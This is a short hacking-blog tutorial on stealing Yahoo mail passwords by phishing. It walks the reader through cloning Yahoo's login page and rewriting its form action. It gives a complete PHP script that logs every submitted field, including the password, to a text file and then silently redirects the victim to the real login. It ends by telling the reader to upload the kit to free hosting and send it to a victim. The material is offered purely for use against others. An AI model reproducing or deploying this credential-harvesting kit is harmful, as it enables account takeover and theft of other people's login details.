Hack A Yahoo Account (Phishing)

Hello friends, I hope you all are fine . Today I am going to show you how can hack a yahoo email account. And today I will be using phishing method to hack this. in this tutorial of phishing in which we will cover how to hack yahoo password.
In this following tutorial to phishing, I will demonstrate how to phish mail.yahoo.com  to hack yahoo account of victim. S o as every other on phishing we start it by creating fake login page.
To create fake login page open mail.yahoo.com from your own web browser and then save it on your desktop as “web page, complete ” with name yahoomail. after above process you will have a file name yahoomail.htm and a folder name yahoomail.files in folder in which you’ll save web page.

Now open yahoomail.htm in ur notepad and find for action word and locate following string

Once located change action string by phish.php, so that above string should appear as following,
action=”phish.php”
STEP 2 : To create phish.php file. Open notepad and type following code in it,
<?php
header (‘Location: https://login.yahoo.com/config/login_verify2?&.src=ym ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Save it as phish.php, now create an empty password log file log.txt. Now sign up for a free webhostingservice which supports php from http://www.100best-free-web-space.com/. Now upload Yahoomail.htm file, php file, password log file and Yahoomail_files folder to that web host. Change permission of log.txt file to777 from settings. Now vector this phished site to victim to get his/her password.
<Source - dailyhackingtips.com>

Leave a comment